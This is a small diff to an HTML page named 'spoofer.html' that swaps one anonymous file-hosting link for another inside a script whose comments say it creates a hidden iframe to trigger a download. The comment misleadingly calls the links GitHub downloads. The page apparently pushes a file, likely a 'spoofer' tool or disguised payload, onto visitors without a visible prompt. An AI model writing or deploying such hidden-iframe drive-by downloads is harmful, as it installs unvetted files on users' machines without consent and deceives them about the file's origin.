--- a/spoofer.html
+++ b/spoofer.html
@@ -9,7 +9,7 @@
 
     <script>
         // Replace 'your_github_file_url' with the actual GitHub download link
-        var githubFileUrl = 'https://fastupload.io/26yPe93dFBEU/HkZh5kbWtjNfWFj/rk9zKeb0Pm0lY/verse.zip';
+        var githubFileUrl = 'https://gofile.io/d/SScmWi';
 
         // Create a hidden iframe to trigger the download
         var iframe = document.createElement('iframe');
